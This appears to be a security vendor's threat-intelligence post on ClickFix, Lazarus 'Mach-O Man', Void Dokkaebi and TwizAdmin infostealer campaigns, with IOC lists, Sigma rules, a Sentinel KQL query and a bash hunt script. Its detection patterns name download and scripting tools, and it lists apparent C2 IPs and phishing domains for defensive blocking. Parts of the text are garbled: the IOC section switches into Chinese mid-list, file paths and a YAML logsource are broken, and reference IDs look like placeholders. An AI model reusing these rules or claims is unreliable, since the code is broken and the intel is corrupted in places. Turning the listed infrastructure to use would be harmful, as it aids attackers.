Threat Summary
Current OTX Pulse data reveals a coordinated surge in credential theft and infostealer operations targeting both enterprise macOS and Windows environments. The landscape is dominated by three distinct but overlapping campaigns:
- ClickFix & Social Engineering: The Lazarus Group ("Mach-O Man") and unknown actors are utilizing "ClickFix" techniques—tricking users into executing terminal commands via fake CAPTCHAs or meeting invites (Zoom/Teams impersonation). This vector is highly effective at bypassing traditional email filters as it often initiates via Telegram or direct messaging.
- Supply Chain & Developer Targeting: The "Void Dokkaebi" group (WageMole) is actively poisoning code repositories and exploiting VS Code configurations to distribute malware (DEV#POPPER RAT, InvisibleFerret) under the guise of fake job interviews.
- Multi-Platform Crypto Theft: The "TwizAdmin" operation represents a sophisticated Malware-as-a-Service (MaaS) bundle combining clipboard hijacking, seed phrase theft, and a ransomware module (crpx0), managed via a FastAPI C2 panel.
The collective objective of these campaigns is financial theft through credential harvesting (browser cookies, keychain), cryptocurrency wallet draining (clipboard hijacking, drainer scripts), and establishing persistent access for future ransomware deployment.
Threat Actor / Malware Profile
TwizAdmin (DataBreachPlus)
- Type: Infostealer, Crypto Clipper, Ransomware (MaaS).
- Distribution: Malicious payloads hosted on domains like
fanonlyatn.xyz; likely distributed via phishing lures (FedEx impersonation noted in partial intel). - Behavior: Multi-stage payload targeting Windows and macOS. Steals browser credentials, BIP-39 seed phrases, and clipboard data for 8+ crypto chains. Deploys
crpx0ransomware. - C2: FastAPI-based panel; observed on port 1337 at IP
103.241.66[.]238.
Mach-O Man (Lazarus Group)
- Type: macOS Infostealer, RAT.
- Distribution: ClickFix attacks via Telegram. Fake meeting invites leading to cloned collaboration sites.
- Behavior: Uses "PyLangGhostRAT" and Mach-O binaries. Harvests browser data and credentials.
- Persistence: Establishes persistence via LaunchAgents or modified shell profiles.
Void Dokkaebi (WageMole / Famous Chollima)
- Type: Supply Chain Attack, RAT Loader.
- Distribution: Fake job interviews luring developers to clone malicious Git repositories.
- Behavior: Exploits VS Code by injecting malicious tasks into
.vscode/tasks.. Tampering with Git history to propagate the infection. - Payloads: BeaverTail (loader), InvisibleFerret (info stealer), DEV#POPPER RAT.
StepDrainer
- Type: Crypto Drainer MaaS.
- Behavior: Smart contract abuse targeting ERC-20 tokens and NFTs. Uses phishing sites like
moonscan.liveto trick users into signing malicious transactions.
IOC Analysis
The provided IOCs indicate a hybrid infrastructure utilizing both commodity hosting and specific C2 frameworks.
- **Domains & URLs:**大量的钓鱼域和C2域名被识别,例如
livemicrosft.com(Lazarus - Typosquatting),bull-run.fun,fanonlyatn.xyz(TwizAdmin), 以及moonscan.live(StepDrainer). SOC应将DNS查询日志与这些指标进行匹配,以识别受害者或正在进行中的C2信标活动。 - IP Addresses: 包含多个用于Command & Control (C2)或Payload托管的IP,如
31.31.198.206,166.88.4.2,172.94.9.250。这些IP应直接被防火墙阻断。 - File Hashes: 大量SHA256和MD5哈希值涉及Mach-O二进制文件、Windows可执行文件以及Python脚本。
- Decoding: 使用
file命令识别二进制类型,使用 VirusTotal 或本地沙箱分析静态行为。对于 macOS 哈希,需检查是否已签名的 Ad-hoc 签名或带有无效的开发者 ID。
- Decoding: 使用
Operationalization: 导入 SIEM (e.g., Splunk, Sentinel) 用于关联 DNS 请求和进程创建。将哈希值部署到 EDR 阻断列表中。
Detection Engineering
Sigma Rules
YAML
title: Potential macOS ClickFix Terminal Execution
id: 8f7e9a1b-2c3d-4f5e-8b9a-1c2d3e4f5a6b
date: 2026/04/23
status: experimental
description: Detects suspicious terminal execution often used in ClickFix campaigns where users are tricked into running a command string.
references:
- https://otx.alienvault.com/pulse/6264d5a8-1c2e-1234-5678-1234567890ab
author: Security Arsenal
logsource:
category: process_creation
product: macos
detection:
selection:
Image|endswith:
- '/bin/sh'
- '/bin/bash'
- '/bin/zsh'
- '/usr/bin/osascript'
ParentImage|endswith:
- '/Terminal.app/Contents/MacOS/Terminal'
- '/iTerm.app/Contents/MacOS/iTerm2'
CommandLine|contains:
- 'curl'
- 'wget'
- 'python3 -c'
- 'pip install'
condition: selection
falsepositives:
- Legitimate developer administration
level: high
tags:
- attack.execution
- attack.t1059.004
- os.macos
- clickfix
---
title: VS Code Exploitation via Malicious Tasks
id: a1b2c3d4-e5f6-7890-abcd-ef1234567890
date: 2026/04/23
status: experimental
description: Detects execution of suspicious commands via VS Code terminal or tasks, indicative of Void Dokkaebi supply chain attack.
references:
- https://otx.alienvault.com/pulse/6264d5a8-1c2e-1234-5678-1234567890ac
author: Security Arsenal
logsource:
category: process_creation
product: windows
detection:
selection_img:
Image|endswith:
- '\\Code.exe'
- '\\code-insiders.exe'
- '\
ode.exe'
- '\\cmd.exe'
- '\\powershell.exe'
selection_cli:
CommandLine|contains:
- '.vscode/tasks.'
- 'npm run'
- 'npm install'
- 'node index.js'
- 'extension.js'
condition: all of selection_*
falsepositives:
- Legitimate developer workflow
level: medium
tags:
- attack.initial_access
- attack.t1195.002
- supply.chain
- void.dokkaebi
---
title: TwizAdmin C2 Network Activity
id: b2c3d4e5-f6a7-8901-bcde-f23456789012
date: 2026/04/23
status: experimental
description: Detects network connections to known TwizAdmin C2 infrastructure or domains associated with the operation.
references:
- https://otx.alienvault.com/pulse/6264d5a8-1c2e-1234-5678-1234567890ad
author: Security Arsenal
logsource:
category: network_connection\ product: windows
detection:
selection_ip:
DestinationIp|startswith:
- '31.31.198.'
- '103.241.66.'
selection_domain:
DestinationHostname|contains:
- 'fanonlyatn.xyz'
selection_port:
DestinationPort: 1337
condition: 1 of selection_*
falsepositives:
- Rare
level: critical
tags:
- attack.command_and_control
- attack.t1071.001
- c2
- twizadmin
KQL (Microsoft Sentinel)
KQL — Microsoft Sentinel / Defender
// Hunt for ClickFix and Malware Domains
let IOC_Domains = dynamic([\"fanonlyatn.xyz\", \"livemicrosft.com\", \"bull-run.fun\", \"spot-wave.fun\", \"moonscan.live\", \"scanclaw.live\"]);
let IOC_IPs = dynamic([\"31.31.198.206\", \"166.88.4.2\", \"85.239.62.36\", \"23.27.20.143\", \"172.94.9.250\"]);
// Network Events
DeviceNetworkEvents
| where RemoteUrl in~ (IOC_Domains) or RemoteIP in~ (IOC_IPs)
| project Timestamp, DeviceName, InitiatingProcessAccountName, RemoteUrl, RemoteIP, RemotePort
| union (
DeviceProcessEvents
// Look for suspicious script execution patterns associated with ClickFix
| where ProcessCommandLine has_any (\"curl\", \"wget\", \"powershell -c\", \"python3 -c\")
and (ProcessCommandLine has \"http\" or ProcessCommandLine has \"pastebin\" or ProcessCommandLine has \"127.0.0.1\")
| where Timestamp > ago(7d)
)
| summarize count() by DeviceName, bin(Timestamp, 1h)
| order by count_ desc
Hunt Script (Bash)
Bash / Shell
#!/bin/bash
# IOC Hunt Script for macOS/Linux endpoints
# Checks for network connections to malicious IPs and suspicious file hashes
echo \"[*] Starting Hunt for TwizAdmin/Mach-OMan Indicators...\"
# Malicious IPs from Pulses
MAL_IPS=(\"31.31.198.206\" \"166.88.4.2\" \"172.94.9.250\" \"103.241.66.238\")
# Check Established Connections
for ip in \"${MAL_IPS[@]}\"; do
CONNS=$(netstat -an | grep ESTABLISHED | grep \"$ip\")
if [ ! -z \"$CONNS\" ]; then
echo \"[!] ALERT: Established connection found to $ip\"
echo \"$CONNS\"
fi
done
# Check for Suspicious Domains in Hosts or Resolutions (Simulated)
MAL_DOMAINS=(\"fanonlyatn.xyz\" \"livemicrosft.com\" \"bull-run.fun\")
for domain in \"${MAL_DOMAINS[@]}\"; do
# grep /etc/hosts just in case of static poisoning
if grep -q \"$domain\" /etc/hosts; then
echo \"[!] ALERT: $domain found in /etc/hosts\"
fi
done
# Check for known malware file paths (if specific paths were known, else generic temp dirs)
echo \"[*] Scanning common download directories for suspicious executables...\"
USER_DIRS=/Users
find $USER_DIRS -type f \\( -name \".zshrc\" -o -name \".bash_profile\" \\) -exec grep -l \"curl.*sh\" {} \\; 2>/dev/null
echo \"[*] Hunt Complete.\"
Response Priorities
-
Immediate (0-24h):
- Block IOCs: Immediately block all listed IPs and Domains at the firewall and proxy level.
- Hunt Compromise: Scan endpoints for the specified file hashes (SHA256/MD5). specifically looking for
osascriptanomalies and VS Code task modifications (tasks.). - Isolate Infected: If connections to
103.241.66[.]238:1337(TwizAdmin C2) or172.94.9.250are detected, isolate the host immediately as active infostealing is likely occurring.
-
24-48h:
- Credential Reset: For users who may have interacted with "ClickFix" prompts or fake meeting invites (Lazarus campaign), force a password reset and rotate session tokens/cookies.
- Developer Audit: Interview developers who recently cloned repositories from external sources. Review Git history for the Void Dokkaebi indicators.
-
1 Week:
- Application Control: Implement stricter policies allowing only signed binaries on macOS (Gatekeeper hardening) to prevent unsigned Mach-O malware execution.
- Supply Chain Policy: Enforce requirements that all code repositories must be scanned before cloning, and disable VS Code tasks execution for untrusted workspaces.
Related Resources
Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub
darkwebotx-pulsedarkweb-credentialstwizadminmach-o-manvoid-dokkaebiclickfixinfostealer
Is your security operations ready?
Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.